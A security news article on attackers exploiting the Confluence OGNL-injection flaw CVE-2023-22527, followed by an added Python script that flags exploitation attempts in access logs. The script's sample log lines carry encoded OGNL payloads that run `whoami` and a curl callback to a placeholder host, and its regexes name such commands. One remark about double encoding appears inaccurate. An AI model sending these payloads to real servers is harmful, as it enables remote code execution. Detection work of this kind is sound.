Malicious actors have started to actively exploit a recently disclosed critical security flaw affecting Atlassian Confluence Data Center and Confluence Server, within three days of public disclosure.
Tracked as CVE-2023-22527 (CVSS score: 10.0), the vulnerability affects out-of-date versions of the software, allowing unauthenticated attackers to achieve remote code execution on susceptible installations.
The shortcoming affects Confluence Data Center and Server 8 versions released before December 5, 2023, as well as 8.4.5. Administrators should check their running version against the fixed releases listed in Atlassian's advisory for CVE-2023-22527 rather than relying on the release date alone.
But barely days after the flaw became public knowledge, nearly 40,000 exploitation attempts targeting CVE-2023-22527 were recorded in the wild as early as January 19 from more than 600 unique IP addresses, according to both the Shadowserver Foundation and the DFIR Report.
The activity is currently limited to “testing callback attempts and ‘whoami’ execution,” suggesting that threat actors are opportunistically scanning for vulnerable servers for follow-on exploitation.
A majority of the attacker IP addresses are from Russia (22,674), followed by Singapore, Hong Kong, the U.S., China, India, Brazil, Taiwan, Japan, and Ecuador.
Over 11,000 Atlassian instances have been found to be accessible over the internet as of January 21, 2024, although it is currently not known how many of them are vulnerable to CVE-2023-22527.
“CVE-2023-22527 is a critical vulnerability within Atlassian’s Confluence Server and Data Center,” ProjectDiscovery researchers Rahul Maini and Harsh Jaiswal said in a technical analysis of the flaw.
“This vulnerability has the potential to allow unauthenticated attackers to inject OGNL expressions into the Confluence instance, thereby enabling the execution of arbitrary code and system commands.”
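The scanning activity described above (OGNL expressions carrying a `whoami` probe or an outbound callback) leaves a recognisable footprint in a Confluence access log. The following is an added example, not code from the article or from ProjectDiscovery, that runs that kind of triage over a few constructed log lines. The log lines, IP addresses and request paths are placeholders invented for the example; the indicator patterns are generic OGNL and Java-reflection markers (`#{`, `%{`, `@class@`, `getRuntime().exec(`), not a signature specific to this CVE, so the verdicts are a starting point for investigation rather than proof of compromise.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in combined access-log format (illustrative, not captured traffic).
# The request paths are placeholders; what matters is the URL-encoded OGNL in the query string.
SAMPLE_LOG = """\
203.0.113.5 - - [19/Jan/2024:10:01:12 +0000] "GET /login.action HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.9 - - [19/Jan/2024:10:02:44 +0000] "POST /some/endpoint.vm?label=%23%7B@java.lang.Runtime@getRuntime().exec('whoami')%7D HTTP/1.1" 200 84 "-" "python-requests/2.31"
198.51.100.23 - - [19/Jan/2024:10:03:01 +0000] "POST /some/endpoint.vm?label=%25%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%27curl%20http%3A%2F%2Fcallback.example%2Fx%27%29%7D HTTP/1.1" 200 84 "-" "curl/8.4.0"
203.0.113.5 - - [19/Jan/2024:10:05:30 +0000] "GET /rest/api/content?title=Project%20%23%7B1%7D HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
"""

# ip, timestamp, method, request target and status from a combined-format line
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# OGNL expression openers; on their own these also occur in benign text, so they only raise suspicion
OGNL_OPEN = re.compile(r"[#%$]\{")
# Java class references and process-spawning calls that make an OGNL expression an RCE attempt
JAVA_REF = re.compile(r"@[\w.]+@|\.getRuntime\(|\.exec\(|ProcessBuilder|\.forName\(", re.I)
# Recon commands typical of a first probe, and commands or URLs used for out-of-band callbacks
RECON_CMD = re.compile(r"\b(whoami|id|uname|hostname)\b")
CALLBACK = re.compile(r"\b(curl|wget|nslookup|dig|ping)\b|https?://", re.I)


def fully_decode(value, rounds=3):
    """URL-decode repeatedly (bounded) so double-encoded payloads are inspected in clear."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_request(target):
    """Return None for a clean request, else a verdict with the exploitation stage(s) seen."""
    decoded = fully_decode(target)
    if not OGNL_OPEN.search(decoded):
        return None
    if not JAVA_REF.search(decoded):
        # Expression syntax without a class reference: e.g. a page title containing "#{1}"
        return {"verdict": "ognl-syntax-only", "stage": [], "decoded": decoded}
    stages = []
    if RECON_CMD.search(decoded):
        stages.append("recon")
    if CALLBACK.search(decoded):
        stages.append("callback")
    return {"verdict": "ognl-injection", "stage": stages, "decoded": decoded}


def analyze_log(text):
    """Parse each line, classify its request target and collect the non-clean ones."""
    findings = []
    for number, line in enumerate(text.splitlines(), 1):
        match = LINE_RE.match(line)
        if not match:
            continue  # unparseable line: skip rather than guess
        result = classify_request(match["target"])
        if result:
            findings.append({"line": number, "ip": match["ip"],
                             "status": int(match["status"]), **result})
    return findings


def sources_by_verdict(findings, verdict="ognl-injection"):
    """Count hits per source IP for one verdict, the shape a blocklist or a ticket needs."""
    counts = {}
    for finding in findings:
        if finding["verdict"] == verdict:
            counts[finding["ip"]] = counts.get(finding["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['ip']} {f['verdict']} {f['stage']} -> {f['decoded']}")
    print(sources_by_verdict(analyze_log(SAMPLE_LOG)))
```

Two design points matter in practice. The decoding is bounded and applied before matching, because scanners routinely double-encode `%{` and `#{` and a single `unquote` would miss the third sample line. The two-tier verdict keeps `#{` alone as "syntax only" and only calls a request an injection when it also references a Java class or spawns a process; a Confluence instance with pages titled like the fourth sample line would otherwise drown a responder in noise. An HTTP 200 on the matching request is not by itself confirmation that the payload ran, so the next step is to pull the matching request bodies and outbound connections for the flagged sources rather than to act on the log line alone.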
Some parts of this article are sourced from:
thehackernews.com